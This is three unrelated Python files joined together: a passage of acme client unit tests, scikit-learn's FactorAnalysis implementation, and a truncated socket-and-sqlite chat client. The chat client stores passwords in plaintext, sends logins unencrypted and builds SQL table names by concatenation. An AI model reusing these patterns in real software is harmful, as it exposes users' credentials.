authzr_uri = 'https://www.letsencrypt-demo.org/acme/authz/1'
challb = messages.ChallengeBody(
uri=(authzr_uri + '/1'), status=messages.STATUS_VALID,
chall=challenges.DNS(token=jose.b64decode(
'evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA')))
self.challr = messages.ChallengeResource(
body=challb, authzr_uri=authzr_uri)
self.authz = messages.Authorization(
identifier=messages.Identifier(
typ=messages.IDENTIFIER_FQDN, value='example.com'),
challenges=(challb,), combinations=None)
self.authzr = messages.AuthorizationResource(
body=self.authz, uri=authzr_uri,
new_cert_uri='https://www.letsencrypt-demo.org/acme/new-cert')
# Request issuance
self.certr = messages.CertificateResource(
body=messages_test.CERT, authzrs=(self.authzr,),
uri='https://www.letsencrypt-demo.org/acme/cert/1',
cert_chain_uri='https://www.letsencrypt-demo.org/ca')
def test_init_downloads_directory(self):
uri = 'http://www.letsencrypt-demo.org/directory'
from acme.client import Client
self.client = Client(
directory=uri, key=KEY, alg=jose.RS256, net=self.net)
self.net.get.assert_called_once_with(uri)
def test_register(self):
# "Instance of 'Field' has no to_json/update member" bug:
# pylint: disable=no-member
self.response.status_code = http_client.CREATED
self.response.json.return_value = self.regr.body.to_json()
self.response.headers['Location'] = self.regr.uri
self.response.links.update({
'next': {'url': self.regr.new_authzr_uri},
'terms-of-service': {'url': self.regr.terms_of_service},
})
self.assertEqual(self.regr, self.client.register(self.new_reg))
# TODO: test POST call arguments
# TODO: split here and separate test
reg_wrong_key = self.regr.body.update(key=KEY2.public_key())
self.response.json.return_value = reg_wrong_key.to_json()
self.assertRaises(
errors.UnexpectedUpdate, self.client.register, self.new_reg)
def test_register_missing_next(self):
self.response.status_code = http_client.CREATED
self.assertRaises(
errors.ClientError, self.client.register, self.new_reg)
def test_update_registration(self):
# "Instance of 'Field' has no to_json/update member" bug:
# pylint: disable=no-member
self.response.headers['Location'] = self.regr.uri
self.response.json.return_value = self.regr.body.to_json()
self.assertEqual(self.regr, self.client.update_registration(self.regr))
# TODO: test POST call arguments
# TODO: split here and separate test
self.response.json.return_value = self.regr.body.update(
contact=()).to_json()
self.assertRaises(
errors.UnexpectedUpdate, self.client.update_registration, self.regr)
def test_query_registration(self):
self.response.json.return_value = self.regr.body.to_json()
self.assertEqual(self.regr, self.client.query_registration(self.regr))
def test_query_registration_updates_new_authzr_uri(self):
self.response.json.return_value = self.regr.body.to_json()
self.response.links = {'next': {'url': 'UPDATED'}}
self.assertEqual(
'UPDATED',
self.client.query_registration(self.regr).new_authzr_uri)
def test_agree_to_tos(self):
self.client.update_registration = mock.Mock()
self.client.agree_to_tos(self.regr)
regr = self.client.update_registration.call_args[0][0]
self.assertEqual(self.regr.terms_of_service, regr.body.agreement)
def test_request_challenges(self):
self.response.status_code = http_client.CREATED
self.response.headers['Location'] = self.authzr.uri
self.response.json.return_value = self.authz.to_json()
self.response.links = {
'next': {'url': self.authzr.new_cert_uri},
}
self.client.request_challenges(self.identifier, self.authzr.uri)
# TODO: test POST call arguments
# TODO: split here and separate test
self.response.json.return_value = self.authz.update(
identifier=self.identifier.update(value='foo')).to_json()
self.assertRaises(
errors.UnexpectedUpdate, self.client.request_challenges,
self.identifier, self.authzr.uri)
def test_request_challenges_missing_next(self):
self.response.status_code = http_client.CREATED
self.assertRaises(
errors.ClientError, self.client.request_challenges,
self.identifier, self.regr)
def test_request_domain_challenges(self):
self.client.request_challenges = mock.MagicMock()
self.assertEqual(
self.client.request_challenges(self.identifier),
self.client.request_domain_challenges('example.com', self.regr))
def test_answer_challenge(self):
self.response.links['up'] = {'url': self.challr.authzr_uri}
self.response.json.return_value = self.challr.body.to_json()
chall_response = challenges.DNSResponse(validation=None)
self.client.answer_challenge(self.challr.body, chall_response)
# TODO: split here and separate test
self.assertRaises(errors.UnexpectedUpdate, self.client.answer_challenge,
self.challr.body.update(uri='foo'), chall_response)
def test_answer_challenge_missing_next(self):
self.assertRaises(
errors.ClientError, self.client.answer_challenge,
self.challr.body, challenges.DNSResponse(validation=None))
def test_retry_after_date(self):
self.response.headers['Retry-After'] = 'Fri, 31 Dec 1999 23:59:59 GMT'
self.assertEqual(
datetime.datetime(1999, 12, 31, 23, 59, 59),
self.client.retry_after(response=self.response, default=10))
@mock.patch('acme.client.datetime')
def test_retry_after_invalid(self, dt_mock):
dt_mock.datetime.now.return_value = datetime.datetime(2015, 3, 27)
dt_mock.timedelta = datetime.timedelta
self.response.headers['Retry-After'] = 'foooo'
self.assertEqual(
datetime.datetime(2015, 3, 27, 0, 0, 10),
self.client.retry_after(response=self.response, default=10))
@mock.patch('acme.client.datetime')
def test_retry_after_seconds(self, dt_mock):
dt_mock.datetime.now.return_value = datetime.datetime(2015, 3, 27)
dt_mock.timedelta = datetime.timedelta
self.response.headers['Retry-After'] = '50'
self.assertEqual(
datetime.datetime(2015, 3, 27, 0, 0, 50),
self.client.retry_after(response=self.response, default=10))
@mock.patch('acme.client.datetime')
def test_retry_after_missing(self, dt_mock):
dt_mock.datetime.now.return_value = datetime.datetime(2015, 3, 27)
dt_mock.timedelta = datetime.timedelta
self.assertEqual(
datetime.datetime(2015, 3, 27, 0, 0, 10),
self.client.retry_after(response=self.response, default=10))
def test_poll(self):
self.response.json.return_value = self.authzr.body.to_json()
self.assertEqual((self.authzr, self.response),
self.client.poll(self.authzr))
# TODO: split here and separate test
self.response.json.return_value = self.authz.update(
identifier=self.identifier.update(value='foo')).to_json()
self.assertRaises(
errors.UnexpectedUpdate, self.client.poll, self.authzr)
def test_request_issuance(self):
self.response.content = CERT_DER
self.response.headers['Location'] = self.certr.uri
self.response.links['up'] = {'url': self.certr.cert_chain_uri}
self.assertEqual(self.certr, self.client.request_issuance(
messages_test.CSR, (self.authzr,)))
# TODO: check POST args
def test_request_issuance_missing_up(self):
self.response.content = CERT_DER
self.response.headers['Location'] = self.certr.uri
self.assertEqual(
self.certr.update(cert_chain_uri=None),
self.client.request_issuance(messages_test.CSR, (self.authzr,)))
def test_request_issuance_missing_location(self):
self.assertRaises(
errors.ClientError, self.client.request_issuance,
messages_test.CSR, (self.authzr,))
@mock.patch('acme.client.datetime')
@mock.patch('acme.client.time')
def test_poll_and_request_issuance(self, time_mock, dt_mock):
# clock.dt | pylint: disable=no-member
clock = mock.MagicMock(dt=datetime.datetime(2015, 3, 27))
def sleep(seconds):
"""increment clock"""
clock.dt += datetime.timedelta(seconds=seconds)
time_mock.sleep.side_effect = sleep
def now():
"""return current clock value"""
return clock.dt
dt_mock.datetime.now.side_effect = now
dt_mock.timedelta = datetime.timedelta
def poll(authzr): # pylint: disable=missing-docstring
# record poll start time based on the current clock value
authzr.times.append(clock.dt)
# suppose it takes 2 seconds for server to produce the
# result, increment clock
clock.dt += datetime.timedelta(seconds=2)
if len(authzr.retries) == 1: # no more retries
done = mock.MagicMock(uri=authzr.uri, times=authzr.times)
done.body.status = authzr.retries[0]
return done, []
# response (2nd result tuple element) is reduced to only
# Retry-After header contents represented as integer
# seconds; authzr.retries is a list of Retry-After
# headers, head(retries) is peeled of as a current
# Retry-After header, and tail(retries) is persisted for
# later poll() calls
return (mock.MagicMock(retries=authzr.retries[1:],
uri=authzr.uri + '.', times=authzr.times),
authzr.retries[0])
self.client.poll = mock.MagicMock(side_effect=poll)
mintime = 7
def retry_after(response, default):
# pylint: disable=missing-docstring
# check that poll_and_request_issuance correctly passes mintime
self.assertEqual(default, mintime)
return clock.dt + datetime.timedelta(seconds=response)
self.client.retry_after = mock.MagicMock(side_effect=retry_after)
def request_issuance(csr, authzrs): # pylint: disable=missing-docstring
return csr, authzrs
self.client.request_issuance = mock.MagicMock(
side_effect=request_issuance)
csr = mock.MagicMock()
authzrs = (
mock.MagicMock(uri='a', times=[], retries=(
8, 20, 30, messages.STATUS_VALID)),
mock.MagicMock(uri='b', times=[], retries=(
5, messages.STATUS_VALID)),
)
cert, updated_authzrs = self.client.poll_and_request_issuance(
csr, authzrs, mintime=mintime,
# make sure that max_attempts is per-authorization, rather
# than global
max_attempts=max(len(authzrs[0].retries), len(authzrs[1].retries)))
self.assertTrue(cert[0] is csr)
self.assertTrue(cert[1] is updated_authzrs)
self.assertEqual(updated_authzrs[0].uri, 'a...')
self.assertEqual(updated_authzrs[1].uri, 'b.')
self.assertEqual(updated_authzrs[0].times, [
datetime.datetime(2015, 3, 27),
# a is scheduled for 10, but b is polling [9..11), so it
# will be picked up as soon as b is finished, without
# additional sleeping
datetime.datetime(2015, 3, 27, 0, 0, 11),
datetime.datetime(2015, 3, 27, 0, 0, 33),
datetime.datetime(2015, 3, 27, 0, 1, 5),
])
self.assertEqual(updated_authzrs[1].times, [
datetime.datetime(2015, 3, 27, 0, 0, 2),
datetime.datetime(2015, 3, 27, 0, 0, 9),
])
self.assertEqual(clock.dt, datetime.datetime(2015, 3, 27, 0, 1, 7))
# CA sets invalid | TODO: move to a separate test
invalid_authzr = mock.MagicMock(
times=[], retries=[messages.STATUS_INVALID])
self.assertRaises(
errors.PollError, self.client.poll_and_request_issuance,
csr, authzrs=(invalid_authzr,), mintime=mintime)
# exceeded max_attemps | TODO: move to a separate test
self.assertRaises(
errors.PollError, self.client.poll_and_request_issuance,
csr, authzrs, mintime=mintime, max_attempts=2)
def test_check_cert(self):
self.response.headers['Location'] = self.certr.uri
self.response.content = CERT_DER
self.assertEqual(self.certr.update(body=messages_test.CERT),
self.client.check_cert(self.certr))
# TODO: split here and separate test
self.response.headers['Location'] = 'foo'
self.assertRaises(
errors.UnexpectedUpdate, self.client.check_cert, self.certr)
def test_check_cert_missing_location(self):
self.response.content = CERT_DER
self.assertRaises(
errors.ClientError, self.client.check_cert, self.certr)
def test_refresh(self):
self.client.check_cert = mock.MagicMock()
self.assertEqual(
self.client.check_cert(self.certr), self.client.refresh(self.certr))
def test_fetch_chain_no_up_link(self):
self.assertEqual([], self.client.fetch_chain(self.certr.update(
cert_chain_uri=None)))
def test_fetch_chain_single(self):
# pylint: disable=protected-access
self.client._get_cert = mock.MagicMock()
self.client._get_cert.return_value = (
mock.MagicMock(links={}), "certificate")
self.assertEqual([self.client._get_cert(self.certr.cert_chain_uri)[1]],
self.client.fetch_chain(self.certr))
def test_fetch_chain_max(self):
# pylint: disable=protected-access
up_response = mock.MagicMock(links={'up': {'url': 'http://cert'}})
noup_response = mock.MagicMock(links={})
self.client._get_cert = mock.MagicMock()
self.client._get_cert.side_effect = [
(up_response, "cert")] * 9 + [(noup_response, "last_cert")]
chain = self.client.fetch_chain(self.certr, max_length=10)
self.assertEqual(chain, ["cert"] * 9 + ["last_cert"])
def test_fetch_chain_too_many(self): # recursive
# pylint: disable=protected-access
response = mock.MagicMock(links={'up': {'url': 'http://cert'}})
self.client._get_cert = mock.MagicMock()
self.client._get_cert.return_value = (response, "certificate")
self.assertRaises(errors.Error, self.client.fetch_chain, self.certr)
def test_revoke(self):
self.client.revoke(self.certr.body)
self.net.post.assert_called_once_with(
self.directory[messages.Revocation], mock.ANY, content_type=None)
def test_revoke_bad_status_raises_error(self):
self.response.status_code = http_client.METHOD_NOT_ALLOWED
self.assertRaises(errors.ClientError, self.client.revoke, self.certr)
class ClientNetworkTest(unittest.TestCase):
"""Tests for acme.client.ClientNetwork."""
def setUp(self):
self.verify_ssl = mock.MagicMock()
self.wrap_in_jws = mock.MagicMock(return_value=mock.sentinel.wrapped)
from acme.client import ClientNetwork
self.net = ClientNetwork(
key=KEY, alg=jose.RS256, verify_ssl=self.verify_ssl,
user_agent='acme-python-test')
self.response = mock.MagicMock(ok=True, status_code=http_client.OK)
self.response.headers = {}
self.response.links = {}
def test_init(self):
self.assertTrue(self.net.verify_ssl is self.verify_ssl)
def test_wrap_in_jws(self):
class MockJSONDeSerializable(jose.JSONDeSerializable):
# pylint: disable=missing-docstring
def __init__(self, value):
self.value = value
def to_partial_json(self):
return {'foo': self.value}
@classmethod
def from_json(cls, value):
pass # pragma: no cover
# pylint: disable=protected-access
jws_dump = self.net._wrap_in_jws(
MockJSONDeSerializable('foo'), nonce=b'Tg')
jws = acme_jws.JWS.json_loads(jws_dump)
self.assertEqual(json.loads(jws.payload.decode()), {'foo': 'foo'})
self.assertEqual(jws.signature.combined.nonce, b'Tg')
def test_check_response_not_ok_jobj_no_error(self):
self.response.ok = False
self.response.json.return_value = {}
# pylint: disable=protected-access
self.assertRaises(
errors.ClientError, self.net._check_response, self.response)
def test_check_response_not_ok_jobj_error(self):
self.response.ok = False
self.response.json.return_value = messages.Error(
detail='foo', typ='serverInternal', title='some title').to_json()
# pylint: disable=protected-access
self.assertRaises(
messages.Error, self.net._check_response, self.response)
def test_check_response_not_ok_no_jobj(self):
self.response.ok = False
self.response.json.side_effect = ValueError
# pylint: disable=protected-access
self.assertRaises(
errors.ClientError, self.net._check_response, self.response)
def test_check_response_ok_no_jobj_ct_required(self):
self.response.json.side_effect = ValueError
for response_ct in [self.net.JSON_CONTENT_TYPE, 'foo']:
self.response.headers['Content-Type'] = response_ct
# pylint: disable=protected-access
self.assertRaises(
errors.ClientError, self.net._check_response, self.response,
content_type=self.net.JSON_CONTENT_TYPE)
def test_check_response_ok_no_jobj_no_ct(self):
self.response.json.side_effect = ValueError
for response_ct in [self.net.JSON_CONTENT_TYPE, 'foo']:
self.response.headers['Content-Type'] = response_ct
# pylint: disable=protected-access,no-value-for-parameter
self.assertEqual(
self.response, self.net._check_response(self.response))
def test_check_response_jobj(self):
self.response.json.return_value = {}
for response_ct in [self.net.JSON_CONTENT_TYPE, 'foo']:
self.response.headers['Content-Type'] = response_ct
# pylint: disable=protected-access,no-value-for-parameter
self.assertEqual(
self.response, self.net._check_response(self.response))
@mock.patch('acme.client.requests')
def test_send_request(self, mock_requests):
mock_requests.request.return_value = self.response
# pylint: disable=protected-access
self.assertEqual(self.response, self.net._send_request(
'HEAD', 'url', 'foo', bar='baz'))
mock_requests.request.assert_called_once_with(
'HEAD', 'url', 'foo', verify=mock.ANY, bar='baz', headers=mock.ANY)
@mock.patch('acme.client.requests')
def test_send_request_verify_ssl(self, mock_requests):
# pylint: disable=protected-access
for verify in True, False:
mock_requests.request.reset_mock()
mock_requests.request.return_value = self.response
self.net.verify_ssl = verify
# pylint: disable=protected-access
self.assertEqual(
self.response, self.net._send_request('GET', 'url'))
mock_requests.request.assert_called_once_with(
'GET', 'url', verify=verify, headers=mock.ANY)
@mock.patch('acme.client.requests')
def test_send_request_user_agent(self, mock_requests):
mock_requests.request.return_value = self.response
# pylint: disable=protected-access
self.net._send_request('GET', 'url', headers={'bar': 'baz'})
mock_requests.request.assert_called_once_with(
'GET', 'url', verify=mock.ANY,
headers={'User-Agent': 'acme-python-test', 'bar': 'baz'})
self.net._send_request('GET', 'url', headers={'User-Agent': 'foo2'})
mock_requests.request.assert_called_with(
'GET', 'url', verify=mock.ANY, headers={'User-Agent': 'foo2'})
@mock.patch('acme.client.requests')
def test_requests_error_passthrough(self, mock_requests):
mock_requests.exceptions = requests.exceptions
mock_requests.request.side_effect = requests.exceptions.RequestException
# pylint: disable=protected-access
self.assertRaises(requests.exceptions.RequestException,
self.net._send_request, 'GET', 'uri')
class ClientNetworkWithMockedResponseTest(unittest.TestCase):
"""Tests for acme.client.ClientNetwork which mock out response."""
# pylint: disable=too-many-instance-attributes
def setUp(self):
from acme.client import ClientNetwork
self.net = ClientNetwork(key=None, alg=None)
self.response = mock.MagicMock(ok=True, status_code=http_client.OK)
self.response.headers = {}
self.response.links = {}
self.checked_response = mock.MagicMock()
self.obj = mock.MagicMock()
self.wrapped_obj = mock.MagicMock()
self.content_type = mock.sentinel.content_type
self.all_nonces = [jose.b64encode(b'Nonce'), jose.b64encode(b'Nonce2')]
self.available_nonces = self.all_nonces[:]
def send_request(*args, **kwargs):
# pylint: disable=unused-argument,missing-docstring
if self.available_nonces:
self.response.headers = {
self.net.REPLAY_NONCE_HEADER:
self.available_nonces.pop().decode()}
else:
self.response.headers = {}
return self.response
# pylint: disable=protected-access
self.net._send_request = self.send_request = mock.MagicMock(
side_effect=send_request)
self.net._check_response = self.check_response
self.net._wrap_in_jws = mock.MagicMock(return_value=self.wrapped_obj)
def check_response(self, response, content_type):
# pylint: disable=missing-docstring
self.assertEqual(self.response, response)
self.assertEqual(self.content_type, content_type)
return self.checked_response
def test_head(self):
self.assertEqual(self.response, self.net.head('url', 'foo', bar='baz'))
self.send_request.assert_called_once_with(
'HEAD', 'url', 'foo', bar='baz')
def test_get(self):
self.assertEqual(self.checked_response, self.net.get(
'url', content_type=self.content_type, bar='baz'))
self.send_request.assert_called_once_with('GET', 'url', bar='baz')
def test_post(self):
# pylint: disable=protected-access
self.assertEqual(self.checked_response, self.net.post(
'uri', self.obj, content_type=self.content_type))
self.net._wrap_in_jws.assert_called_once_with(
self.obj, jose.b64decode(self.all_nonces.pop()))
assert not self.available_nonces
self.assertRaises(errors.MissingNonce, self.net.post,
'uri', self.obj, content_type=self.content_type)
self.net._wrap_in_jws.assert_called_with(
self.obj, jose.b64decode(self.all_nonces.pop()))
def test_post_wrong_initial_nonce(self): # HEAD
self.available_nonces = [b'f', jose.b64encode(b'good')]
self.assertRaises(errors.BadNonce, self.net.post, 'uri',
self.obj, content_type=self.content_type)
def test_post_wrong_post_response_nonce(self):
self.available_nonces = [jose.b64encode(b'good'), b'f']
self.assertRaises(errors.BadNonce, self.net.post, 'uri',
self.obj, content_type=self.content_type)
def test_head_get_post_error_passthrough(self):
self.send_request.side_effect = requests.exceptions.RequestException
for method in self.net.head, self.net.get:
self.assertRaises(
requests.exceptions.RequestException, method, 'GET', 'uri')
self.assertRaises(requests.exceptions.RequestException,
self.net.post, 'uri', obj=self.obj)
if __name__ == '__main__':
unittest.main() # pragma: no cover
|
|
"""Factor Analysis.
A latent linear variable model.
FactorAnalysis is similar to probabilistic PCA implemented by PCA.score
While PCA assumes Gaussian noise with the same variance for each
feature, the FactorAnalysis model assumes different variances for
each of them.
This implementation is based on David Barber's Book,
Bayesian Reasoning and Machine Learning,
http://www.cs.ucl.ac.uk/staff/d.barber/brml,
Algorithm 21.1
"""
# Author: Christian Osendorfer <osendorf@gmail.com>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Denis A. Engemann <denis-alexander.engemann@inria.fr>
# License: BSD3
import warnings
from math import sqrt, log
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..externals.six.moves import xrange
from ..utils import check_array, check_random_state
from ..utils.extmath import fast_logdet, randomized_svd, squared_norm
from ..utils.validation import check_is_fitted
from ..exceptions import ConvergenceWarning
class FactorAnalysis(BaseEstimator, TransformerMixin):
"""Factor Analysis (FA)
A simple linear generative model with Gaussian latent variables.
The observations are assumed to be caused by a linear transformation of
lower dimensional latent factors and added Gaussian noise.
Without loss of generality the factors are distributed according to a
Gaussian with zero mean and unit covariance. The noise is also zero mean
and has an arbitrary diagonal covariance matrix.
If we would restrict the model further, by assuming that the Gaussian
noise is even isotropic (all diagonal entries are the same) we would obtain
:class:`PPCA`.
FactorAnalysis performs a maximum likelihood estimate of the so-called
`loading` matrix, the transformation of the latent variables to the
observed ones, using expectation-maximization (EM).
Read more in the :ref:`User Guide <FA>`.
Parameters
----------
n_components : int | None
Dimensionality of latent space, the number of components
of ``X`` that are obtained after ``transform``.
If None, n_components is set to the number of features.
tol : float
Stopping tolerance for EM algorithm.
copy : bool
Whether to make a copy of X. If ``False``, the input X gets overwritten
during fitting.
max_iter : int
Maximum number of iterations.
noise_variance_init : None | array, shape=(n_features,)
The initial guess of the noise variance for each feature.
If None, it defaults to np.ones(n_features)
svd_method : {'lapack', 'randomized'}
Which SVD method to use. If 'lapack' use standard SVD from
scipy.linalg, if 'randomized' use fast ``randomized_svd`` function.
Defaults to 'randomized'. For most applications 'randomized' will
be sufficiently precise while providing significant speed gains.
Accuracy can also be improved by setting higher values for
`iterated_power`. If this is not sufficient, for maximum precision
you should choose 'lapack'.
iterated_power : int, optional
Number of iterations for the power method. 3 by default. Only used
if ``svd_method`` equals 'randomized'
random_state : int, RandomState instance or None, optional (default=0)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`. Only used when ``svd_method`` equals 'randomized'.
Attributes
----------
components_ : array, [n_components, n_features]
Components with maximum variance.
loglike_ : list, [n_iterations]
The log likelihood at each iteration.
noise_variance_ : array, shape=(n_features,)
The estimated noise variance for each feature.
n_iter_ : int
Number of iterations run.
References
----------
.. David Barber, Bayesian Reasoning and Machine Learning,
Algorithm 21.1
.. Christopher M. Bishop: Pattern Recognition and Machine Learning,
Chapter 12.2.4
See also
--------
PCA: Principal component analysis is also a latent linear variable model
which however assumes equal noise variance for each feature.
This extra assumption makes probabilistic PCA faster as it can be
computed in closed form.
FastICA: Independent component analysis, a latent variable model with
non-Gaussian latent variables.
"""
def __init__(self, n_components=None, tol=1e-2, copy=True, max_iter=1000,
noise_variance_init=None, svd_method='randomized',
iterated_power=3, random_state=0):
self.n_components = n_components
self.copy = copy
self.tol = tol
self.max_iter = max_iter
if svd_method not in ['lapack', 'randomized']:
raise ValueError('SVD method %s is not supported. Please consider'
' the documentation' % svd_method)
self.svd_method = svd_method
self.noise_variance_init = noise_variance_init
self.iterated_power = iterated_power
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the FactorAnalysis model to X using EM
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
Returns
-------
self
"""
X = check_array(X, copy=self.copy, dtype=np.float64)
n_samples, n_features = X.shape
n_components = self.n_components
if n_components is None:
n_components = n_features
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
# some constant terms
nsqrt = sqrt(n_samples)
llconst = n_features * log(2. * np.pi) + n_components
var = np.var(X, axis=0)
if self.noise_variance_init is None:
psi = np.ones(n_features, dtype=X.dtype)
else:
if len(self.noise_variance_init) != n_features:
raise ValueError("noise_variance_init dimension does not "
"with number of features : %d != %d" %
(len(self.noise_variance_init), n_features))
psi = np.array(self.noise_variance_init)
loglike = []
old_ll = -np.inf
SMALL = 1e-12
# we'll modify svd outputs to return unexplained variance
# to allow for unified computation of loglikelihood
if self.svd_method == 'lapack':
def my_svd(X):
_, s, V = linalg.svd(X, full_matrices=False)
return (s[:n_components], V[:n_components],
squared_norm(s[n_components:]))
elif self.svd_method == 'randomized':
random_state = check_random_state(self.random_state)
def my_svd(X):
_, s, V = randomized_svd(X, n_components,
random_state=random_state,
n_iter=self.iterated_power)
return s, V, squared_norm(X) - squared_norm(s)
else:
raise ValueError('SVD method %s is not supported. Please consider'
' the documentation' % self.svd_method)
for i in xrange(self.max_iter):
# SMALL helps numerics
sqrt_psi = np.sqrt(psi) + SMALL
s, V, unexp_var = my_svd(X / (sqrt_psi * nsqrt))
s **= 2
# Use 'maximum' here to avoid sqrt problems.
W = np.sqrt(np.maximum(s - 1., 0.))[:, np.newaxis] * V
del V
W *= sqrt_psi
# loglikelihood
ll = llconst + np.sum(np.log(s))
ll += unexp_var + np.sum(np.log(psi))
ll *= -n_samples / 2.
loglike.append(ll)
if (ll - old_ll) < self.tol:
break
old_ll = ll
psi = np.maximum(var - np.sum(W ** 2, axis=0), SMALL)
else:
warnings.warn('FactorAnalysis did not converge.' +
' You might want' +
' to increase the number of iterations.',
ConvergenceWarning)
self.components_ = W
self.noise_variance_ = psi
self.loglike_ = loglike
self.n_iter_ = i + 1
return self
def transform(self, X):
"""Apply dimensionality reduction to X using the model.
Compute the expected mean of the latent variables.
See Barber, 21.2.33 (or Bishop, 12.66).
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
The latent variables of X.
"""
check_is_fitted(self, 'components_')
X = check_array(X)
Ih = np.eye(len(self.components_))
X_transformed = X - self.mean_
Wpsi = self.components_ / self.noise_variance_
cov_z = linalg.inv(Ih + np.dot(Wpsi, self.components_.T))
tmp = np.dot(X_transformed, Wpsi.T)
X_transformed = np.dot(tmp, cov_z)
return X_transformed
def get_covariance(self):
"""Compute data covariance with the FactorAnalysis model.
``cov = components_.T * components_ + diag(noise_variance)``
Returns
-------
cov : array, shape (n_features, n_features)
Estimated covariance of data.
"""
check_is_fitted(self, 'components_')
cov = np.dot(self.components_.T, self.components_)
cov.flat[::len(cov) + 1] += self.noise_variance_ # modify diag inplace
return cov
def get_precision(self):
"""Compute data precision matrix with the FactorAnalysis model.
Returns
-------
precision : array, shape (n_features, n_features)
Estimated precision of data.
"""
check_is_fitted(self, 'components_')
n_features = self.components_.shape[1]
# handle corner cases first
if self.n_components == 0:
return np.diag(1. / self.noise_variance_)
if self.n_components == n_features:
return linalg.inv(self.get_covariance())
# Get precision using matrix inversion lemma
components_ = self.components_
precision = np.dot(components_ / self.noise_variance_, components_.T)
precision.flat[::len(precision) + 1] += 1.
precision = np.dot(components_.T,
np.dot(linalg.inv(precision), components_))
precision /= self.noise_variance_[:, np.newaxis]
precision /= -self.noise_variance_[np.newaxis, :]
precision.flat[::len(precision) + 1] += 1. / self.noise_variance_
return precision
def score_samples(self, X):
"""Compute the log-likelihood of each sample
Parameters
----------
X : array, shape (n_samples, n_features)
The data
Returns
-------
ll : array, shape (n_samples,)
Log-likelihood of each sample under the current model
"""
check_is_fitted(self, 'components_')
Xr = X - self.mean_
precision = self.get_precision()
n_features = X.shape[1]
log_like = np.zeros(X.shape[0])
log_like = -.5 * (Xr * (np.dot(Xr, precision))).sum(axis=1)
log_like -= .5 * (n_features * log(2. * np.pi)
- fast_logdet(precision))
return log_like
def score(self, X, y=None):
"""Compute the average log-likelihood of the samples
Parameters
----------
X : array, shape (n_samples, n_features)
The data
Returns
-------
ll : float
Average log-likelihood of the samples under the current model
"""
return np.mean(self.score_samples(X))
|
|
import socket,sqlite3,tkinter,time
from multiprocessing import Process, Queue
def add_nulls(dlen,data):
to_ret = data
if(len(data)<dlen):
dif = dlen-len(data)
to_ret = "0"*dif+to_ret
return to_ret
class settings:
def __init__(self):
connection = sqlite3.connect("conf.db")
cur = connection.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS config(
NAME TEXT,
VALUE TEXT)
''')
cur.execute('''
CREATE TABLE IF NOT EXISTS servers(
ID INTEGER PRIMARY KEY,
NAME TEXT,
ADDR TEXT,
PORT TEXT,
LOGIN TEXT,
PASSWORD TEXT)
''')
connection.commit()
connection.close()
def get_setting(self,sname):
connection = sqlite3.connect("conf.db")
cur = connection.cursor()
cur.execute("SELECT VALUE FROM config WHERE NAME = ?",(sname,))
result = cur.fetchone()
connection.close()
return(result)
def set_setting(self,sname,value):
connection = sqlite3.connect("conf.db")
cur = connection.cursor()
cur.execute("INSERT INTO config VALUES(?,?)",(sname,value))
connection.close()
def save_server(self,sname,addr,port,login,pwd):
connection = sqlite3.connect("conf.db")
cur = connection.cursor()
cur.execute("REPLACE INTO servers VALUES(NULL,?,?,?,?,?)",(sname,addr,port,login,pwd))
connection.commit()
connection.close()
def get_all_servers(self):
connection = sqlite3.connect("conf.db")
cur = connection.cursor()
cur.execute("SELECT * FROM servers")
result = cur.fetchall()
connection.close()
return(result)
class history:
def make_tname(self,cID,sID):
tname = "chat"
tname+=add_nulls(8,str(cID))
tname+=add_nulls(8,str(sID))
return(tname)
def add_msg(self,cID,sID,sender,message):
tname = self.make_tname(cID,sID)
connection = sqlite3.connect("chats.db")
cur = connection.cursor()
cur.execute('''
CREATE TABLE IF NOT EXISTS '''+tname+'''(
SENDER INTEGER,
MESSAGE BLOB)
''')
connection.commit()
cur.execute("INSERT INTO "+tname+" VALUES(?,?)",(sender,message))
connection.commit()
connection.close()
def get_chat(self,cID,sID):
tname = self.make_tname(cID,sID)
connection = sqlite3.connect("chats.db")
cur = connection.cursor()
try:
cur.execute("SELECT * FROM "+tname)
result = cur.fetchall()
except:
result = []
connection.close()
return(result)
def get_all_users(self,sID):
ssID = add_nulls(8,str(sID))
connection = sqlite3.connect("chats.db")
cur = connection.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
usr = cur.fetchall()
usrs = []
for i in usr:
t = i[0]
if(t[12:]==ssID):
usrs.append(t[4:12])
return(usrs)
class connection:
def __init__(self,serv):
self.addr = serv[2]
self.port = int(serv[3])
self.login = serv[4]
self.pwd = serv[5]
self.key = 0
self.ID = 0
def check_connection(self):
key,ID = self.perform_login()
self.key = key
self.ID = ID
if(key!=0 and ID!=0):
return(1)
else:
return(0)
def get_users(self):
msg = "WOLFIN".encode("utf-8")
msglen = len(msg)
t,sock = self.say_hello(msglen)
if(t==1):
sock.send(msg)
answ = sock.recv(18).decode("utf-8")
if(answ[:2]=="OK"):
torec = int(answ[2:])
answ = sock.recv(torec)
answ = answ.decode("utf-8")
to_ret = []
while(len(answ)>8):
to_ret.append(answ[:8])
answ = answ[8:]
to_ret.append(answ)
return(to_ret)
else:
return([])
def check_key(self):
sock = socket.socket()
sock.connect((self.addr, self.port))
msg = ("CHK"+str(self.key)).encode("utf-8")
sock.send(msg)
answ = sock.recv(6)
print(answ)
def say_hello(self,size):
sock = socket.socket()
sock.connect((self.addr, self.port))
msg = ("MES0001"+add_nulls(4,str(size))).encode("utf-8")
sock.send(msg)
answ = sock.recv(6)
answ = answ.decode("utf-8")
if(answ[:2]=="OK"):
return(1,sock)
else:
return(0,sock)
def perform_login(self):
login = self.login.encode("utf-8")
pwd = self.pwd.encode("utf-8")
llen = add_nulls(4,str(len(login))).encode("utf-8")
pwdlen = add_nulls(4,str(len(pwd))).encode("utf-8")
msg = "LOG".encode("utf-8")+llen+pwdlen+login+pwd+"FIN".encode("utf-8")
msglen = len(msg)
t,sock = self.say_hello(msglen)
if(t==1):
sock.send(msg)
answ = sock.recv(18)
answ = answ.decode("utf-8")
if(answ[:2]=="OK"):
key = int(answ[2:10])
ID = int(answ[10:])
